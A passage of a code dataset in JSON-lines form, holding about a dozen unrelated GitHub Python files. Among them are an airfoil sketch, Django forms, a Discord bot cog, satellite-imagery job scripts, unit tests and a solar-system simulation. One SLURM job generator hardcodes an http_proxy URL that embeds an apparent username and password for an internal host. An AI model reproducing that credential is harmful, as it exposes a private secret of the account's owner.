09:34:46 2022\r\n\r\nGoal:\r\n Sketch the airfoil\r\n\r\n@author: mcaoue2\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\n\r\n\r\n\r\n\r\nclass SketchAirFoil():\r\n def __init__(self):\r\n return\r\n \r\n \r\n def get_contour(self, angle=0, N_pts=100):\r\n \r\n # From https://www.researchgate.net/publication/312222678_Simple_analytic_equation_for_airfoil_shape_description\r\n B = 2\r\n T = 0.15\r\n C = 0.08\r\n P = 1\r\n E = 1\r\n R = 0\r\n \r\n # Parametric parameter\r\n t = np.linspace(0.001, 2*np.pi-0.001, N_pts)\r\n \r\n x = 0.5 + 0.5*np.abs(np.cos(t))**B/np.cos(t)\r\n \r\n y = (0.5*T*np.abs(np.sin(t))**B/np.sin(t)*(1-x**P) + \r\n C*np.sin(x**E*np.pi) + \r\n R*np.sin(x*2*np.pi) ) \r\n \r\n # Rotate\r\n rot_M = np.matrix([[np.cos(-angle), -np.sin(-angle)], \r\n [np.sin(-angle), np.cos(-angle)] ])\r\n \r\n cx, cy = np.dot(rot_M, [x, y])\r\n \r\n return np.array(cx)[0], np.array(cy)[0]\r\n \r\n \r\nif __name__ == '__main__': \r\n # Verify some property of the airfoil\r\n \r\n # =============================================================================\r\n # Visualize the skecth\r\n # =============================================================================\r\n \r\n import matplotlib.pyplot as plt \r\n\r\n\r\n self = SketchAirFoil()\r\n \r\n cont_x, cont_y = self.get_contour(angle=0.1)\r\n \r\n plt.figure()\r\n plt.plot(-cont_x, cont_y, color='r')\r\n plt.axis('equal')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"MichaelCaouette/Paramotor_modeling","sub_path":"Paramotor Model/sketch_airfoil.py","file_name":"sketch_airfoil.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40687628046","text":"from authentication.models import User\nfrom users.models import UserProfile, Business, SubBusiness\nfrom django.forms import ModelForm, PasswordInput, Textarea, CheckboxSelectMultiple\nfrom django import forms\n\n\nclass Credential(ModelForm):\n\tclass Meta:\n\t\tmodel = User\n\t\tfields = ['first_name']\n\n\nclass Customer(ModelForm):\n\tclass Meta:\n\t\tmodel = UserProfile\n\t\tfields = ['photo', 'desc']\n\t\twidgets = {\n\t\t\t'desc': Textarea()\n\t\t}\n\t\t\nclass Business(ModelForm):\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(Business, self).__init__(*args, **kwargs)\n\t\tself.fields['address_area'].empty_label = 'Please select'\n\n\tclass Meta:\n\t\tmodel = UserProfile\n\t\tfields = ['business_name', 'website', 'mobile_number', 'desc', 'get_sms',\n\t\t 'address_1', 'address_2', 'address_3', 'address_area',\n\t\t 'can_travel', 'travel_distance', 'customer_travel', 'only_remote',\n\t\t 'employees','facebook', 'linkedin', 'twitter', 'pinterest', 'instagram','logo', 'photo'\n\t\t]\n\t\twidgets = {\n\t\t\t'travel_distance': CheckboxSelectMultiple,\n\t\t\t'desc': Textarea\n\t\t}\n\nclass BusinessHead(ModelForm):\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(BusinessHead, self).__init__(*args, **kwargs)\n\t\tself.fields['address_area'].empty_label = 'Please select'\n\t\t\n\tclass Meta:\n\t\tmodel = UserProfile\n\t\tfields = [\n\t\t\t'business_name', \n\t\t\t'website', \n\t\t\t'mobile_number', \n\t\t\t'photo', \n\t\t\t'address_1', \n\t\t\t'address_2', \n\t\t\t'address_3', \n\t\t\t'address_area',\n\t\t\t'employees',\n\t\t\t'business_since',\n\t\t\t'logo'\n\t\t]\n\nclass BusinessCompanyDesc(ModelForm):\n\tclass Meta:\n\t\tmodel = UserProfile\n\t\tfields = ['desc']\n\t\twidgets = {\n\t\t\t'desc': Textarea\n\t\t}\n\nclass BusinessSerivceDesc(ModelForm):\n\tdef __init__(self, *args,**kwargs):\n\t\tsuper (BusinessSerivceDesc, self).__init__(*args,**kwargs) # populates the post\n\t\tself.fields['sub_business'].queryset = SubBusiness.objects.filter(business=self.instance.business.first)\n\n\n\tclass Meta:\n\t\tmodel = UserProfile\n\t\tfields = ['sub_business','service_desc']\n\t\twidgets = {\n\t\t\t'sub_business': CheckboxSelectMultiple,\n\t\t\t'service_desc': Textarea\n\t\t}\n\nclass BusinessPreference(ModelForm):\n\tclass Meta:\n\t\tmodel = UserProfile\n\t\tfields = ['travel_to_customer','customer_travel','travel_distance']\n\t\twidgets = {\n\t\t\t'travel_distance': CheckboxSelectMultiple\n\t\t}\n\nclass BusinessCompanyDetail(ModelForm):\n\tclass Meta:\n\t\tmodel = UserProfile\n\t\tfields = ['address_1', 'address_2', 'address_3', 'address_4','employees','business_since']\n\nclass BusinessCompanySocial(ModelForm):\n\tclass Meta:\n\t\tmodel = UserProfile\n\t\tfields = ['facebook', 'linkedin', 'twitter', 'google', 'pinterest', 'instagram']\n\nclass BusinessWorkImage(ModelForm):\n\tclass Meta:\n\t\tmodel = UserProfile\n\t\tfields = ['work_image_1', 'work_image_2', 'work_image_3']\n\t\t\nclass ShowCase(forms.Form):\n\n\ttitle = forms.CharField(required=True, max_length=1024, widget=forms.TextInput(attrs={\n\t\t\"class\":\"form-control\", \n\t\t\"required\":\"\", \n\t\t\"data-parsley-ui-enabled\":\"false\"}))\n\n\tattIds = []\n\tnew_count = 0\n\tnew_field_prefix = \"new_\"\n\n\tdef __init__(self, *args, **kwargs):\n\t\tattIds = kwargs.pop('attIds')\n\t\tnew_count = kwargs.pop('new_count', 0)\n\t\tself.form_name = kwargs.pop('form_name')\n\n\t\tsuper(ShowCase, self).__init__(*args, **kwargs)\n\n\t\tself.attIds = attIds\n\t\tself.new_count = new_count\n\n\t\tfor attId in attIds:\n\t\t\tself._add_field('',str(attId))\n\n\t\tfor i in range(new_count):\n\t\t\tself._add_field(self.new_field_prefix, str(i))\n\n\tdef _add_field(self, prefix, id):\n\t\tself.fields[self.form_name + '_' + prefix + 'caption_' + id] = forms.CharField(\n\t\t\tmax_length=1024,\n\t\t\twidget=forms.TextInput(attrs={\n\t\t\t\t\"class\":\"form-control\", \n\t\t\t\t\"placeholder\":\"Add Caption\", \n\t\t\t\t\"required\":\"\", \n\t\t\t\t\"data-parsley-ui-enabled\":\"false\"\n\t\t\t}),\n\t\t\trequired=False\n\t\t)\n\t\tself.fields[self.form_name + '_' + prefix + 'file_' + id] = forms.FileField(required=False)\n\n\tdef get_file_rows(self):\n\t\trows = []\n\t\tfor attId in self.attIds: \n\t\t\trows.append({\n\t\t\t\t'caption' : self[self.form_name + '_caption_' + str(attId)], \n\t\t\t\t'file': self[self.form_name + '_file_' + str(attId)],\n\t\t\t\t'attId': attId\n\t\t\t})\n\n\t\tfor i in range(self.new_count): \n\t\t\trows.append({\n\t\t\t\t'caption' : self[self.form_name + '_' + self.new_field_prefix + 'caption_' + str(i)], \n\t\t\t\t'file': self[self.form_name + '_' + self.new_field_prefix + 'file_' + str(i)],\n\t\t\t})\n\n\t\treturn rows","repo_name":"thenrikie/weconnect","sub_path":"users/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4785196035","text":"from typing import Union\nimport time\n\nimport disnake\nfrom disnake.ext import commands\n\nfrom src.logger import get_voice_logger\nfrom src.ext.activity.services import add_voice_time\n\n\nlogger = get_voice_logger()\nMIN_MEMRBER_AMOUNT = 2\n\n\nclass VoiceActivityCog(commands.Cog):\n def __init__(self, bot) -> None:\n self.bot = bot\n self.count_for = {}\n self.allowed_channels = set()\n\n def external_sync(\n self,\n user: Union[disnake.Member, disnake.User],\n ) -> None:\n if not isinstance(user, disnake.Member):\n return\n\n voice_state = user.voice\n if not voice_state:\n return\n\n channel = voice_state.channel\n if not channel:\n return\n\n self._check_channel(channel)\n self._sync_member(user)\n\n @commands.Cog.listener()\n async def on_voice_state_update(\n self,\n member: disnake.Member,\n before: disnake.VoiceState,\n after: disnake.VoiceState\n ) -> None:\n if member.bot:\n return\n\n if before.channel != after.channel:\n if before.channel:\n self._check_channel(before.channel)\n if after.channel:\n self._check_channel(after.channel)\n\n self._sync_member(member)\n\n def _sync_member(self, member: disnake.Member) -> None:\n self._try_remove_from_count(member)\n self._try_add_to_count(member)\n\n def _try_remove_from_count(self, member: disnake.Member) -> None:\n if not self._is_count_for(member):\n return\n\n seconds = time.time() - self.count_for.pop(\n (member.guild.id, member.id)\n )\n logger.info('stop voice activity for %s on guild %s (%ds.)',\n member, member.guild, seconds)\n add_voice_time(\n member.guild.id,\n member.id,\n int(seconds),\n )\n\n def _try_add_to_count(self, member: disnake.Member) -> None:\n voice_state = member.voice\n if not voice_state:\n return\n if not self._is_can_add_to_count(member):\n return\n\n self.count_for[(member.guild.id, member.id)] = time.time()\n logger.info('start count voice activity for %s on guild %s',\n member, member.guild)\n\n def _check_channel(\n self,\n channel: Union[disnake.VoiceChannel,\n disnake.StageChannel]\n ) -> None:\n members = channel.members\n members = list(filter(_is_conversation_participant, members))\n\n if len(members) >= MIN_MEMRBER_AMOUNT:\n if not self._is_channel_allowed(channel):\n self.allowed_channels.add(channel.id)\n logger.info('add %s to allowed_channels', channel)\n for member in members:\n self._try_add_to_count(member)\n else:\n if self._is_channel_allowed(channel):\n self.allowed_channels.remove(channel.id)\n logger.info('remove %s from allowed_channels', channel)\n for member in members:\n self._try_remove_from_count(member)\n\n def _is_can_add_to_count(self, member: disnake.Member) -> bool:\n voice_state = member.voice\n if not voice_state:\n return False\n\n channel = voice_state.channel\n if not channel:\n return False\n\n return (_is_conversation_participant(member) and\n not self._is_count_for(member) and\n self._is_channel_allowed(channel))\n\n def _is_count_for(self, member: disnake.Member) -> bool:\n return (member.guild.id, member.id) in self.count_for\n\n def _is_channel_allowed(\n self,\n channel: Union[disnake.VoiceChannel,\n disnake.StageChannel]\n ) -> bool:\n return channel.id in self.allowed_channels\n\n\ndef _is_conversation_participant(member: disnake.Member) -> bool:\n return not member.bot and not _is_muted(member)\n\n\ndef _is_muted(member: disnake.Member) -> bool:\n voice_state = member.voice\n if not voice_state:\n return False\n return voice_state.deaf or voice_state.self_deaf\n\n\ndef setup(bot) -> None:\n bot.add_cog(VoiceActivityCog(bot))\n","repo_name":"Ferlern/CindocuBot","sub_path":"src/ext/activity/voice_activity.py","file_name":"voice_activity.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"3229421124","text":"from pbprocesstools.pbpt_q_process import PBPTGenQProcessToolCmds\nimport rsgislib\nimport logging\nimport os\nimport sys\n\nsys.path.insert(0, \"../../01_sen2_ard/03_find_dwnld_scns\")\nfrom sen2scnprocess import RecordSen2Process\n\nlogger = logging.getLogger(__name__)\n\nclass GenExtractSamplesCmds(PBPTGenQProcessToolCmds):\n\n def gen_command_info(self, **kwargs):\n if not os.path.exists(kwargs['scn_db_file']):\n raise Exception(\"Sentinel-2 scene database does not exist...\")\n\n sen2_rcd_obj = RecordSen2Process(kwargs['scn_db_file'])\n scns = sen2_rcd_obj.get_processed_scns()\n err_scns = []\n for scn in scns:\n #print(scn.product_id)\n scn_out_mng_file = os.path.join(kwargs['granule_out_h5_samples_path'], \"{}_mng_smpls.h5\".format(scn.product_id))\n scn_out_oth_file = os.path.join(kwargs['granule_out_h5_samples_path'], \"{}_oth_smpls.h5\".format(scn.product_id))\n scn_out_wat_file = os.path.join(kwargs['granule_out_h5_samples_path'], \"{}_wat_smpls.h5\".format(scn.product_id))\n scn_out_cpl_file = os.path.join(kwargs['granule_out_h5_samples_path'], \"{}_cmplt.txt\".format(scn.product_id))\n if (not os.path.exists(scn_out_cpl_file)):\n vld_img = self.find_first_file(scn.ard_path, \"*valid.kea\", rtn_except=False)\n clrsky_img = self.find_first_file(scn.ard_path, \"*clearsky_refine.kea\", rtn_except=False)\n sref_img = self.find_first_file(scn.ard_path, \"*vmsk_rad_srefdem_stdsref.kea\", rtn_except=False)\n if (vld_img is None) or (clrsky_img is None) or (sref_img is None):\n clouds_img = self.find_first_file(scn.ard_path, \"*clouds.kea\", rtn_except=False)\n if clouds_img is None:\n print(\"***ERROR***: {}\".format(scn.ard_path))\n err_scns.append(scn.ard_path)\n else:\n c_dict = dict()\n c_dict['scn_id'] = scn.product_id\n c_dict['vld_img'] = vld_img\n c_dict['clrsky_img'] = clrsky_img\n c_dict['sref_img'] = sref_img\n c_dict['samples_vec_file'] = kwargs['samples_vec_file']\n c_dict['samples_vec_lyr'] = kwargs['samples_vec_lyr']\n c_dict['samples_vec_edits'] = kwargs['samples_vec_edits']\n c_dict['mangrove_samp_lyrs'] = kwargs['mangrove_samp_lyrs']\n c_dict['other_samp_lyrs'] = kwargs['other_samp_lyrs']\n c_dict['not_mng_regions'] = kwargs['not_mng_regions']\n c_dict['not_oth_regions'] = kwargs['not_oth_regions']\n c_dict['water_smpls_vec_file'] = kwargs['water_smpls_vec_file']\n c_dict['water_smpls_vec_lyr'] = kwargs['water_smpls_vec_lyr']\n c_dict['scn_out_mng_file'] = scn_out_mng_file\n c_dict['scn_out_oth_file'] = scn_out_oth_file\n c_dict['scn_out_wat_file'] = scn_out_wat_file\n c_dict['scn_out_cpl_file'] = scn_out_cpl_file\n c_dict['tmp_dir'] = os.path.join(kwargs['tmp_dir'], \"{}_extract_smpls\".format(scn.product_id))\n if not os.path.exists(c_dict['tmp_dir']):\n os.mkdir(c_dict['tmp_dir'])\n self.params.append(c_dict)\n print(\"ERRORS:\")\n for err_scn in err_scns:\n print(err_scn)\n\n def run_gen_commands(self):\n self.gen_command_info(scn_db_file='/scratch/a.pfb/gmw_v2_gapfill/scripts/01_sen2_ard/03_find_dwnld_scns/sen2_scn.db',\n samples_vec_file='/scratch/a.pfb/gmw_v2_gapfill/data/granule_mang_train_smpls_uid.gpkg',\n samples_vec_lyr='samples',\n samples_vec_edits='/scratch/a.pfb/gmw_v2_gapfill/scripts/03_sen2_mangrove_cls/01_define_training/gmw_gap_fill_train_edits.gpkg',\n mangrove_samp_lyrs='mangrove_pts',\n other_samp_lyrs='other_pts',\n not_mng_regions='not_mangroves_regions',\n not_oth_regions='not_other_regions',\n water_smpls_vec_file='/scratch/a.pfb/gmw_v2_gapfill/scripts/03_sen2_mangrove_cls/01_define_training/gmw_water_train_smps.gpkg',\n water_smpls_vec_lyr='water_smps',\n granule_out_h5_samples_path='/scratch/a.pfb/gmw_v2_gapfill/data/scn_h5_samples',\n tmp_dir='/scratch/a.pfb/gmw_v2_gapfill/tmp')\n self.pop_params_db()\n self.create_slurm_sub_sh(\"extract_sen2_samples\", 16448, '/scratch/a.pfb/gmw_v2_gapfill/logs',\n run_script='run_exe_analysis.sh', job_dir=\"job_scripts\",\n db_info_file=None, account_name='scw1376', n_cores_per_job=10, n_jobs=10,\n job_time_limit='2-23:59',\n module_load='module load parallel singularity\\n\\nexport http_proxy=\"http://a.pfb:proxy101019@10.212.63.246:3128\"\\nexport https_proxy=\"http://a.pfb:proxy101019@10.212.63.246:3128\"\\n')\n\n\nif __name__ == \"__main__\":\n py_script = os.path.abspath(\"extract_scn_train_data.py\")\n script_cmd = \"singularity exec --bind /scratch/a.pfb:/scratch/a.pfb --bind /home/a.pfb:/home/a.pfb /scratch/a.pfb/sw_imgs/au-eoed-dev.sif python {}\".format(py_script)\n\n process_tools_mod = 'extract_scn_train_data'\n process_tools_cls = 'ExtractSceneTrainSamples'\n\n create_tools = GenExtractSamplesCmds(cmd=script_cmd, db_conn_file=\"/home/a.pfb/gmw_gap_fill_db/pbpt_db_conn.txt\",\n lock_file_path=\"./gmw_gapfill_lock_file.txt\",\n process_tools_mod=process_tools_mod, process_tools_cls=process_tools_cls)\n create_tools.parse_cmds()\n","repo_name":"globalmangrovewatch/gmw_gap_fill_2020","sub_path":"03_sen2_mangrove_cls/02_extract_scene_training/gen_extract_scn_train_data_cmds.py","file_name":"gen_extract_scn_train_data_cmds.py","file_ext":"py","file_size_in_byte":5967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7000203942","text":"import os\nimport warnings\n\nimport numpy as np\nfrom numpy.testing import assert_array_almost_equal\nimport pytest\n\nfrom stdatamodels.jwst.datamodels import FilteroffsetModel, ImageModel\n\n\nFITS_FILE = os.path.join(os.path.dirname(__file__), 'data', 'sip.fits')\n\n\ndef test_get_fits_wcs(tmpdir):\n with ImageModel(FITS_FILE) as dm:\n\n # Refer to the data array to initialize it.\n dm.data = np.zeros((5, 5))\n\n # Now continue with the test.\n wcs1 = dm.get_fits_wcs()\n dm2 = dm.copy()\n wcs2 = dm2.get_fits_wcs()\n\n x = np.random.rand(2 ** 16, wcs1.wcs.naxis)\n world1 = wcs1.all_pix2world(x, 1)\n world2 = wcs2.all_pix2world(x, 1)\n\n assert_array_almost_equal(world1, world2)\n\n wcs1.wcs.crpix[0] = 42.0\n\n dm2.set_fits_wcs(wcs1)\n assert dm2.meta.wcsinfo.crpix1 == 42.0\n\n with warnings.catch_warnings():\n # Filter out warnings generated by WCSLIB>=7.1\n warnings.simplefilter(\"ignore\")\n wcs2 = dm2.get_fits_wcs()\n assert wcs2.wcs.crpix[0] == 42.0\n\n dm2_tmp_fits = str(tmpdir.join(\"tmp_dm2.fits\"))\n dm2.to_fits(dm2_tmp_fits)\n\n with ImageModel(dm2_tmp_fits) as dm3:\n wcs3 = dm3.get_fits_wcs()\n\n assert wcs3.wcs.crpix[0] == 42.0\n\n x = np.random.rand(2 ** 16, wcs1.wcs.naxis)\n world1 = wcs1.all_pix2world(x, 1)\n world2 = wcs3.all_pix2world(x, 1)\n\n dm4 = ImageModel((10, 10))\n dm4.set_fits_wcs(wcs3)\n dm4_tmp_fits = str(tmpdir.join(\"tmp_dm4.fits\"))\n dm4.to_fits(dm4_tmp_fits, overwrite=True)\n\n with ImageModel(dm4_tmp_fits) as dm5:\n with warnings.catch_warnings():\n # Filter out warnings generated by WCSLIB>=7.1\n warnings.simplefilter(\"ignore\")\n wcs5 = dm5.get_fits_wcs()\n\n assert wcs5.wcs.crpix[0] == 42.0\n\n\ndef test_wcs_ref_models():\n filters = [{'name': 'F090W', 'row_offset': 1, 'column_offset': 1},\n {'name': 'F070W', 'row_offset': 2, 'column_offset': 2}\n ]\n with FilteroffsetModel(filters=filters, instrument='NIRCAM', strict_validation=True) as fo:\n fo.filters == filters\n with pytest.raises(ValueError, match=\"Model.meta is missing values for\"\n \"['description', 'reftype', 'author', 'pedigree',\"\n \"'useafter']\"):\n fo.validate()\n\n filters = [{'filter': 'F090W', 'pupil': 'GRISMR',\n 'row_offset': 1, 'column_offset': 1},\n {'filter': 'F070W', 'pupil': 'GRISMC',\n 'row_offset': 2, 'column_offset': 2}\n ]\n with FilteroffsetModel(filters=filters, instrument='NIRCAM', strict_validation=True) as fo:\n fo.filters == filters\n fo.meta.description = \"Filter offsets\"\n fo.meta.reftype = \"filteroffset\"\n fo.meta.author = \"Unknown\"\n fo.meta.pedigree = \"GROUND\"\n fo.meta.useafter = \"2019-12-01\"\n\n with pytest.raises(ValueError, match=\"Expected meta.instrument.channel for \"\n \"instrument NIRCAM to be one of \"):\n fo.validate()\n fo.meta.instrument.channel = 'SHORT'\n fo.meta.instrument.module = \"A\"\n fo.validate()\n","repo_name":"spacetelescope/stdatamodels","sub_path":"src/stdatamodels/jwst/datamodels/tests/test_wcs.py","file_name":"test_wcs.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"9067423213","text":"from flask import Flask, request, jsonify\nfrom minio import Minio\n\nclient = Minio('127.0.0.1:9000', access_key='accessKey', secret_key='secretKey', secure=False)\napp = Flask(__name__)\n\n@app.route('/', methods=['POST', 'GET'])\ndef main():\n payload = request.get_json()\n a = client.get_object('json-files', payload['Records'][0]['s3']['object']['key'])\n print(a.read())\n return jsonify(payload)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8082, debug=True)\n","repo_name":"ashok-an/minio-workflow","sub_path":"notification-webhook/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43267112083","text":"import sys\nsys.path.append(\"..\") # noqa\nimport TranscriptClean as TC\nimport pytest\nimport os\nimport subprocess\nimport pybedtools\nimport warnings\n\n\n@pytest.mark.unit\nclass TestProcessSpliceAnnot(object):\n def test_tmp_files(self):\n \"\"\" Check that the expected tmp files are created.\"\"\"\n\n sj_file = \"input_files/toy_sjs_mixed_chroms.txt\"\n chroms = set([\"chr1\", \"chr2\"])\n tmp_dir = \"scratch/sj_reading_test/\"\n os.system(\"mkdir -p \" + tmp_dir)\n\n donor_bt, accept_bt, annot = TC.processSpliceAnnotation(sj_file, tmp_dir,\n chroms, process=\"test\")\n\n # Check if paths of tmp files are correct\n assert os.path.exists(\n \"scratch/sj_reading_test/splice_files/test_ref_splice_donors_tmp.bed\")\n assert os.path.exists(\n \"scratch/sj_reading_test/splice_files/test_ref_splice_acceptors_tmp.bed\")\n assert os.path.exists(\n \"scratch/sj_reading_test/splice_files/test_ref_splice_donors_tmp.sorted.bed\")\n assert os.path.exists(\n \"scratch/sj_reading_test/splice_files/test_ref_splice_acceptors_tmp.sorted.bed\")\n\n def test_chrom_filtering(self):\n \"\"\" Check that only chr1 and chr2 junctions get saved\"\"\"\n\n sj_file = \"input_files/toy_sjs_mixed_chroms.txt\"\n chroms = set([\"chr1\", \"chr2\"])\n tmp_dir = \"scratch/sj_reading_test/\"\n os.system(\"mkdir -p \" + tmp_dir)\n\n donor_bt, accept_bt, annot = TC.processSpliceAnnotation(sj_file, tmp_dir,\n chroms, process=\"test\")\n # Check donor chroms\n # donor_chroms = set()\n # for pos in donor_bt:\n # donor_chroms.add(pos.chrom)\n assert set(donor_bt.Chromosome) == chroms\n\n # Check acceptor chroms\n # acc_chroms = set()\n # for pos in accept_bt:\n # acc_chroms.add(pos.chrom)\n assert set(accept_bt.Chromosome) == chroms\n\n def test_chrom_warning(self):\n \"\"\" Make sure the function prints a warning if no splice donors or \n acceptors are found on the provided chromosome. \"\"\"\n\n sj_file = \"input_files/toy_sjs_mixed_chroms.txt\"\n chroms = set([\"chr18\"])\n tmp_dir = \"scratch/sj_reading_test/\"\n os.system(\"mkdir -p \" + tmp_dir)\n\n assert pytest.warns(Warning, TC.processSpliceAnnotation, sj_file,\n tmp_dir, chroms, process=\"test\")\n\n def test_splice_donors(self):\n \"\"\" Make sure that the correct positions got labeled as splice donors \"\"\"\n\n sj_file = \"input_files/toy_sjs_mixed_chroms.txt\"\n chroms = set([\"chr1\", \"chr2\"])\n tmp_dir = \"scratch/sj_reading_test/\"\n os.system(\"mkdir -p \" + tmp_dir)\n\n donor_bt, accept_bt, annot = TC.processSpliceAnnotation(sj_file, tmp_dir,\n chroms, process=\"test\")\n\n # Remember, file is 1-based but BedTool is 0-based\n expected_donors = set([99, 399])\n\n assert set(donor_bt.Start) == expected_donors\n\n # donors = set()\n # for donor in donor_bt:\n # donors.add(donor.start)\n # assert donors == expected_donors\n\n def test_splice_acceptors(self):\n \"\"\" Make sure that the correct positions got labeled as splice acceptors \"\"\"\n\n sj_file = \"input_files/toy_sjs_mixed_chroms.txt\"\n chroms = set([\"chr1\", \"chr2\"])\n tmp_dir = \"scratch/sj_reading_test/\"\n os.system(\"mkdir -p \" + tmp_dir)\n\n donor_bt, accept_bt, annot = TC.processSpliceAnnotation(sj_file, tmp_dir,\n chroms, process=\"test\")\n\n # Remember, file is 1-based but BedTool is 0-based\n expected_acc = set([199, 299])\n assert set(accept_bt.Start) == expected_acc\n\n # acceptors = set()\n # for acc in accept_bt:\n # acceptors.add(acc.start)\n # assert acceptors == expected_acc\n","repo_name":"mortazavilab/TranscriptClean","sub_path":"testing_suite/test_process_splice_annotation.py","file_name":"test_process_splice_annotation.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"35"} +{"seq_id":"13452271043","text":"array = list(map(lambda x: int(x), input().split()))\ndata = input()\nwhile not data == \"end\":\n data = data.split()\n command = data[0]\n if command == \"swap\":\n index1 = int(data[1])\n index2 = int(data[2])\n array[index1], array[index2] = array[index2], array[index1]\n elif command == \"multiply\":\n index1 = int(data[1])\n index2 = int(data[2])\n array[index1] *= array[index2]\n elif command == \"decrease\":\n array = [num - 1 for num in array]\n\n data = input()\nprint(*array, sep=\", \")","repo_name":"astankin/Python-Fundamentals","sub_path":"Fundamentals-MidExamPreparation2022/World_Tour.py","file_name":"World_Tour.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41298023927","text":"\"\"\"\nЗадача 3. Круг\nЧто нужно сделать\nНа координатной плоскости рисуются круги, у каждого круга следующие параметры: координаты X и Y центра круга и значение\nR ― радиус круга. По умолчанию центр находится в (0, 0), а радиус равен 1.\n\nРеализуйте класс «Круг», который инициализируется по этим параметрам. Круг также может:\nНаходить и возвращать свою площадь.\nНаходить и возвращать свой периметр.\nУвеличиваться в K раз.\nОпределять, пересекается ли он с другой окружностью.\n\"\"\"\n\n\nimport math\n\nclass Circle():\n '''Добавляем данные по окружности (х,у,r)'''\n\n def __init__(self, x, y, r):\n self.x = x\n self.y = y\n self.r = r\n\n def area_search(self):\n '''Находит и выводит площадь окружности'''\n self.square = math.pi * self.r ** 2\n\n def perimeter_search(self):\n '''Находит периметр'''\n self.perimeter = 2 * math.pi * self.r\n\n def increase(self):\n '''Увеличить в К раз'''\n k = int(input('Восколько раз увеличить окружность: '))\n self.r = self.r * k\n print('Изменение окружности после увеличения.')\n self.area_search()\n self.perimeter_search()\n self.print_circle()\n\n def intersection(self):\n '''Проверяем пересечение окружностей.'''\n self.distance = ((circle_1.x - circle_2.x) ** 2 + (circle_1.y - circle_2.y) ** 2)\n if self.distance == 0:\n print('Окружность 1 входит в окружность 2' if circle_1.r > circle_2.r else 'Окружность 2 входит в окружность 1')\n elif self.distance < (circle_1.r + circle_2.r) ** 2:\n print('Окружности пересекаются.')\n else:\n print('Окружности не пересекаются.')\n\n def print_circle(self):\n '''Вывод на экран'''\n print('Площадь окружности: {}\\nПериметр окружности: {}\\n\\n'.format(self.square, self.perimeter))\n\n\n def launching_programm(self):\n '''Запуск программы'''\n self.area_search()\n self.perimeter_search()\n self.print_circle()\n self.increase()\n self.intersection()\n\n\ncircle_1 =Circle(4, 3, 3)\ncircle_2 =Circle(0, 0, 1)\ncircle_1.launching_programm()\ncircle_2.launching_programm()\n\n\n\n","repo_name":"ZinovkinIgor/-Skillbox","sub_path":"Модуль 24/Домашнее задание/task 3.py","file_name":"task 3.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27340934838","text":"from math import cos, sin\n\nimport pyglet\nfrom fishpy.geometry import Point2D, Vector2D\n\nfrom body import Body, BodyType\n\nFPS = 120\n\nWINDOW_SIZE = Point2D(1000, 1000)\n\n\nwindow = pyglet.window.Window(\n width=WINDOW_SIZE.x, height=WINDOW_SIZE.y, resizable=False)\nbatch = pyglet.graphics.Batch()\ncenter = WINDOW_SIZE/2\n# sun = pyglet.shapes.Circle(center.x, center.y, radius=100,\n# color=[255, 255, 0, 2], batch=batch)\n\nsun = Body(100, color=(255, 255, 0), pos=center,\n type=BodyType.SUN, static=False, batch=batch)\nplanet1 = Body(15, color=(0, 255, 128), pos=center+Point2D(450, 0),\n type=BodyType.PLANET, batch=batch, vel=Vector2D(0, -1.5))\nplanet2 = Body(10, color=(200, 10, 50), pos=center-Point2D(300, 0),\n type=BodyType.PLANET, batch=batch, vel=Vector2D(0, 2))\nmoon = Body(2, color=(200, 200, 200), pos=planet1.position+Point2D(30, 0),\n type=BodyType.MOON, batch=batch, vel=Vector2D(0, -2))\n\nbodies = [sun, planet1, planet2, moon]\n\n\ndef update(dt):\n for i, body in enumerate(bodies):\n body.step()\n body.gravitational_acceleration(bodies[:i]+bodies[i+1:])\n\n sun.step()\n planet1.step()\n planet2.step()\n sun.gravitational_acceleration([planet1, planet2])\n planet1.gravitational_acceleration([sun, planet2])\n planet2.gravitational_acceleration([sun, planet1])\n window.clear()\n batch.draw()\n\n\nif __name__ == '__main__':\n pyglet.clock.schedule_interval(update, 1/FPS)\n pyglet.app.run()\n","repo_name":"TheBiggerFish/PygletFun","sub_path":"SolarSystemSim/solar_system.py","file_name":"solar_system.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35429108482","text":"import numpy as np\nimport sys\nimport math\nimport operator\nimport csv\nimport glob,os\nimport xlrd\nimport cv2\nimport pandas as pd\nimport os\nimport glob\n# import matplotlib.pyplot as plt\n\nfrom sklearn.svm import SVC\nfrom collections import Counter\nfrom sklearn.metrics import confusion_matrix\nimport scipy.io as sio\n\nfrom keras.models import Sequential, Model\nfrom keras.layers import LSTM, Dense, TimeDistributed\nfrom keras.utils import np_utils\nfrom keras import metrics\nfrom keras import backend as K\nfrom keras.models import model_from_json\nimport keras\nimport pydot, graphviz\nfrom keras.utils import np_utils, plot_model\nfrom keras.preprocessing import image as img\nfrom keras.applications.vgg16 import preprocess_input\nfrom keras.applications.resnet50 import preprocess_input as res_preprocess_input\n\n# from simple_test_image_cutting import cut_algorithm_call_all\n\nfrom labelling import 